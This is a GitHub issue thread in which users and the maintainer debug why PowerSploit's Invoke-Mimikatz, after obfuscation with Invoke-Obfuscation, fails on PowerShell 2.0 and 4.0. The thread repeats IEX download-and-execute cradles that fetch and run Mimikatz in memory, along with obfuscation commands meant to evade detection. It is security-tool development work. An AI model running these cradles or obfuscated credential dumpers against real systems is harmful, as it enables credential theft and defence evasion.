Obfuscated Scripts Incompatible on PS < 5.1

[byt3bl33d3r]

Hey there! First off really awesome project!

As the title says, I've been noticing that most obfuscated Powershell scripts (specifically PowerSploit scripts) seem to be incompatible on Powershell < 5.1.

Here's some background on how/what I'm doing:

• I'm running the following Invoke-Obfuscation command on Powershell on Linux ( I have tested obfuscating the script on Powershell v2.0 on Win7 with the same results.)

PS /home/byt3bl33d3r> $PSVersionTable                                                                                                                                                                                                          

Name                           Value                                                                                                                                                                                                          
----                           -----                                                                                                                                                                                                          
PSVersion                      6.0.0-alpha                                                                                                                                                                                                    
PSEdition                      Core                                                                                                                                                                                                           
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}                                                                                                                                                                                        
BuildVersion                   3.0.0.0                                                                                                                                                                                                        
GitCommitId                    Could not find file '/usr/lib/powershell/ubuntu.16.04-x64/powershell.version'.                                                                                                                                 
CLRVersion                                                                                                                                                                                                                                    
WSManStackVersion              3.0                                                                                                                                                                                                            
PSRemotingProtocolVersion      2.3                                                                                                                                                                                                            
SerializationVersion           1.1.0.1                                                                                                                                                                                                        

PS /home/byt3bl33d3r> Import-Module Invoke-Obfuscation.psd1
PS /home/byt3bl33d3r> Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -Quiet

Works as expected \o/

Windows 10 (PS version 5.1)

Works as expected.

PS C:\Users\yomama3> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.1.14393.693
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.14393.693
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1

PS C:\Users\yomama3> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama3> iNVokE-mimIkATZ

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

---SNIP---

Windows 8.1 (PS version 4.0)

Here the IEX cradle works, when executing the cmdlet however it errors out.

PS C:\Users\yomama1> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      4.0
WSManStackVersion              3.0
SerializationVersion           1.1.0.1
CLRVersion                     4.0.30319.42000
BuildVersion                   6.3.9600.17400
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion      2.2

PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:433 char:3
+         ${vIRTu`AL`AllO`CEx} =  (&("{1}{0}{2}"-f 't-va','Ge','rIaBLE') ('1Re'+'fV')  - ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:463 char:3
+         ${v`irTua`lfRee} =   (&("{0}{2}{1}"-f'Va','e','riabL')  ("{0}{1}"-f'1','REFV') ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${v`irTUaL`PR`OTe`CT} =  (  &("{2}{1}{0}"-f'aBLe','I','VAr')  ("1Re"+"fV") -va ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:503 char:9
+         ${r`EadpRO`cessMemo`RY} =  (&("{0}{1}"-f'VarIaB','LE')  ("{0}{1}" -f'1', ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:508 char:9
+         ${cr`EATEReM`ot`et`H`ReaD} =   ( &("{3}{0}{2}{1}"-f 'ARI','le','AB','GeT ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "FromBase64String" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:2541 char:13
+             [Byte[]]${pe`BYtEs} = [Byte[]] ( &("{2}{1}{0}"-f'RiABle','t-Va','GE' ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Cannot index into a null array.
At line:2547 char:9
+         ${PeBy`T`Es}[0] = 0
+         ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:2548 char:9
+         ${pE`BYT`ES}[1] = 0
+         ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

iNvOKE-meMorYlOaDLIBraRY : Cannot bind argument to parameter 'pEBYTEs' because it is null.
At line:2552 char:102
+ ... mor') -PEBytes ${p`eb`YTES} -ExeArgs ${Exe`ArgS}
+                    ~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [iNvOKE-meMorYlOaDLIBraRY], ParameterBindingValidationExceptio
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,iNvOKE-meMorYlOaDLIBraRY

Cannot index into a null array.
At line:2563 char:3
+         ${p`EHa`NDLE} = ${pE`lO`A`de`dinfo}[0]
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:2564 char:3
+         ${r`EM`OT`e`PEHaNdLe} = ${p`el`oAD`edI`NFo}[1]
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

PEHandle is null or IntPtr.Zero
At line:1060 char:4
+             throw ("{5}{0}{6}{4}{3}{1}{8}{2}{7}{9}"-f 'and','ull ','t','n','e is ','PEH', ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Zero:String) [], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero

Windows 7 (PS v2.0)

Here the both the IEX cradle & cmdlet error out.

PS C:\Users\yomama> $PSVersionTable

Name                           Value
----                           -----
CLRVersion                     2.0.50727.5420
BuildVersion                   6.1.7601.17514
PSVersion                      2.0
WSManStackVersion              2.0
PSCompatibleVersions           {1.0, 2.0}
SerializationVersion           1.1.0.1
PSRemotingProtocolVersion      2.1

PS C:\Users\yomama> IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
At line:1 char:4
+ IEX <<<<  (New-Object Net.WebClient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\yomama> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Users\yomama> iNVokE-mimIkATZ
The variable '$cOMMaNd' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2657 char:35
+         ${e`xEA`RgS} = ${cOM`MaNd} <<<<
    + CategoryInfo          : InvalidOperation: (cOMMaNd:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$eXEArGS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2674 char:180
+         &("{2}{1}{0}{3}" -f 'Co','voke-','In','mmand') -ScriptBlock ${R`EmOTE
Sc`RIp`Tb`Lock} -ArgumentList @(${PEbYT`E`S64}, ${pE`BYt`ES32}, ("{0}{1}" -f 'V
','oid'), 0, "", ${e`XE`ArGS} <<<< )
    + CategoryInfo          : InvalidOperation: (eXEArGS:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2547 char:22
+         ${PeBy`T`Es}[ <<<< 0] = 0
    + CategoryInfo          : InvalidOperation: (0:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2548 char:22
+         ${pE`BYT`ES}[ <<<< 1] = 0
    + CategoryInfo          : InvalidOperation: (1:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

iNvOKE-meMorYlOaDLIBraRY : Cannot bind argument to parameter 'pEBYTEs' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2552 char:101
+             ${peLoa`dedIN`Fo} = &("{2}{1}{0}{5}{4}{3}" -f 'e','voke-M','In','
y','yLoadLibrar','mor') -PEBytes <<<<  ${p`eb`YTES} -ExeArgs ${Exe`ArgS}
    + CategoryInfo          : InvalidData: (:) [iNvOKE-meMorYlOaDLIBraRY], Par
   ameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
   owed,iNvOKE-meMorYlOaDLIBraRY

The variable '$pELoADedinFo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2558 char:26
+         if (${pELoAD`e`d`in`Fo} <<<<  -eq  (  &("{1}{0}"-f'Item','GEt-') ("{4
}{1}{0}{2}{3}"-f'e:dH','aBl','aQ','j','vari'))."Va`LUE"::"zE`Ro")
    + CategoryInfo          : InvalidOperation: (pELoADedinFo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pElOAdedinfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2563 char:38
+         ${p`EHa`NDLE} = ${pE`lO`A`de`dinfo} <<<< [0]
    + CategoryInfo          : InvalidOperation: (pElOAdedinfo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$peloADedINFo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2564 char:46
+         ${r`EM`OT`e`PEHaNdLe} = ${p`el`oAD`edI`NFo} <<<< [1]
    + CategoryInfo          : InvalidOperation: (peloADedINFo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2674 char:4
+         & <<<< ("{2}{1}{0}{3}" -f 'Co','voke-','In','mmand') -ScriptBlock ${R
`EmOTESc`RIp`Tb`Lock} -ArgumentList @(${PEbYT`E`S64}, ${pE`BYt`ES32}, ("{0}{1}"
 -f 'V','oid'), 0, "", ${e`XE`ArGS})
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Ze
   ro:String) [Invoke-Command], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
   hell.Commands.InvokeCommandCommand

At first I thought it might be an issue with PowerShell on Linux, but I did the same thing on PowerShell on WIndows with the same results, so this does seem to be a bug.

Let me know if you need any more information.

Cheers!

[danielbohannon]

Hi byt3bl33d3r, glad to hear you're like this project! Thanks for submitting this bug report. It seems that string obfuscation for ParameterSetName fields in parameter bindings (but not DefaultParameterSetName) fields are causing errors when concatenation or even -f format operator reordering is performed (even if encapsulate with curly braces as a script block). I don't recall seeing this causing errors before for PS2 through PS5, but it definitely is not working at this point.

I just pushed an updated Out-ObfuscatedTokenCommand.ps1 file (e6b01edbb2ff8b3f6b571650020e88ad9fb002e7) that includes a string token fix as well as a variable token fix.

I am no longer seeing the above errors with Invoke-Mimikatz on either PS2 or PS5. Would you mind re-testing your scenario(s) and let me know if this resolves your issues? Curious if there is more to the errors that you're seeing.

Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet

[byt3bl33d3r]

Just re-tested, now seeing the following errors, let me know if I'm missing something.

Windows 7 (PS v2)

IEX cradle now throws a different error, running the cmdlet still errors out.

PS C:\Users\yomama> IEX (New-Object Net.Webclient).DownloadString('http://192.16
8.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Missing closing ')' in expression.
At line:1 char:4
+ IEX <<<<  (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invo
ke-Mimikatz.ps1')
    + CategoryInfo          : ParserError: (CloseParenToken:TokenId) [Invoke-E
   xpression], ParseException
    + FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.Powe
   rShell.Commands.InvokeExpressionCommand

PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Import-Module .\test.ps1
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Invoke-Mimikatz
The variable '$COmmAND' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2657 char:35
+         ${E`x`EARgs} = ${COmm`AND} <<<<
    + CategoryInfo          : InvalidOperation: (COmmAND:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$eXEaRgS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:173
+         &("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motESc`RIP
t`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id','Vo'
), 0, "", ${eX`Ea`RgS} <<<< )
    + CategoryInfo          : InvalidOperation: (eXEaRgS:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2547 char:22
+         ${pEB`Y`Tes}[ <<<< 0] = 0
    + CategoryInfo          : InvalidOperation: (0:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2548 char:22
+         ${peBY`T`Es}[ <<<< 1] = 0
    + CategoryInfo          : InvalidOperation: (1:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

inVoke-mEMORYLOaDLiBraRY : Cannot bind argument to parameter 'PeBYteS' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2552 char:94
+             ${Pel`oAdeD`iNfo} = &("{2}{3}{0}{1}{4}" -f'-Memo','ry','Invo','ke
','LoadLibrary') -PEBytes <<<<  ${pe`By`TEs} -ExeArgs ${e`xeAR`gs}
    + CategoryInfo          : InvalidData: (:) [inVoke-mEMORYLOaDLiBraRY], Par
   ameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
   owed,inVoke-mEMORYLOaDLiBraRY

The variable '$PeLOADEDiNfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2558 char:25
+         if (${PeL`O`ADEDi`Nfo} <<<<  -eq  ${I1`qo}::"z`eRo")
    + CategoryInfo          : InvalidOperation: (PeLOADEDiNfo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pELoADEDinFO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2563 char:36
+         ${PE`han`Dle} = ${p`E`LoADEDinFO} <<<< [0]
    + CategoryInfo          : InvalidOperation: (pELoADEDinFO:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pELOaDediNfO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2564 char:44
+         ${Rem`O`TepEhA`NDle} = ${pE`LOaDed`i`NfO} <<<< [1]
    + CategoryInfo          : InvalidOperation: (pELOaDediNfO:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:4
+         & <<<< ("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motE
Sc`RIPt`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id
','Vo'), 0, "", ${eX`Ea`RgS})
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Ze
   ro:String) [Invoke-Command], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
   hell.Commands.InvokeCommandCommand

Windows 8.1 (PS v4)

Seems to be the same error as last time.

PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+         ${vIR`T`UalALLOC} =  (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+         ${m`E`mCPy} =   (  varIabLE  ("{1}{0}"-f 'Fpq','76')  -va )::("{4}{5}{0}{3}{2} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+         ${lOAd`L`I`BRARy} =   ( geT-VaRIaBLe ("76"+"fpQ")  -ValueoNl  )::("{6}{1}{3}{5 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+         ${V`IRTu`AlfRE`EEX} =   (  geT-VARiaBLe  ("{1}{0}" -f'PQ','76F')  -vaL  )::("{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${virTUA`LP`R`oTE`CT} =   (  GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+         ${cREAtET`HRE`Ad} =  (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+         ${vIR`T`UalALLOC} =  (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+         ${m`E`mCPy} =   (  varIabLE  ("{1}{0}"-f 'Fpq','76')  -va )::("{4}{5}{0}{3}{2} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+         ${lOAd`L`I`BRARy} =   ( geT-VaRIaBLe ("76"+"fpQ")  -ValueoNl  )::("{6}{1}{3}{5 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+         ${V`IRTu`AlfRE`EEX} =   (  geT-VARiaBLe  ("{1}{0}" -f'PQ','76F')  -vaL  )::("{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${virTUA`LP`R`oTE`CT} =   (  GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+         ${cREAtET`HRE`Ad} =  (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

You cannot call a method on a null-valued expression.
At line:2212 char:5
+                 ${P`eHAN`dLe} = ${w`in`32fun`cTions}."vIRt`Ua`LaLl`oC"."i`Nv`oKe"(${loAd`AD` ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new
PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might
be free).
At line:2224 char:4
+             Throw ("{13}{10}{18}{0}{30}{16}{14}{47}{50}{48}{4}{45}{43}{44}{12}{49}{41}{7} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (VirtualAlloc fa...might be free).:String) [], RuntimeException
    + FullyQualifiedErrorId : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running
    the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the ad
  dress the PE wants might be free).

[danielbohannon]

Can you provide some more information?

For the obfuscated version of Invoke-Mimikatz what obfuscation command(s) are you running? Something like this?

Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet

Also, if you run a LOCAL de-obfuscated version of Invoke-Mimikatz with your default download cradle in PS2.0 then you will get the "Missing closing ')' in expression" error depending on how you downloaded Invoke-Mimikatz.

For example, if you download via .DownloadFile then you won't get this error, but if you download via .DownloadString piped to a local file then you will get this error.

Download copy of Invoke-Mimikatz to disk

$LocalFile = 'c:\users\me\mimi.ps1' (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') > $LocalFile

Invoke local copy of Invoke-Mimikatz

IEX (New-Object Net.Webclient).DownloadString($LocalFile)

Above command should error on PS2.0

So it seems that this is a PS2.0 download cradle error depending on formatting of target local file, and not an issue of obfuscation being applied to Invoke-Mimikatz script.

For the remaining issue you stated, I just need more information for how you are obfuscated Invoke-Mimikatz, and what the difference is between Invoke-Mimikatz.ps1 and .\test.ps1 in your provided examples.

Thanks for your patience. I'll try my best to get these issues hammered as soon as I can.

[byt3bl33d3r]

Hey sorry for the late response,

Thanks for the clarification on the IEX cradle issue, will try that asap.

I ran the same invoke-obfuscation command as before

Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -Quiet

There shouldn't be any difference between Invoke-Mimikatz.ps1 and test.ps1, one was obfuscated using Powershell on Linux and the other using Powershell 2.0 on Windows 7. I did that initially just to rule out the possibility of it being an issue obfuscating the script using Powershell on Linux.

Let me know if that cleared things up and if you need any more info.

[newlog]

Hi there,

I can give you some more detail from the tests I've been carrying out.

This is my PS version for Windows 10:

[17:53:09]:[..]/trialanderror$ $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.0.10586.672
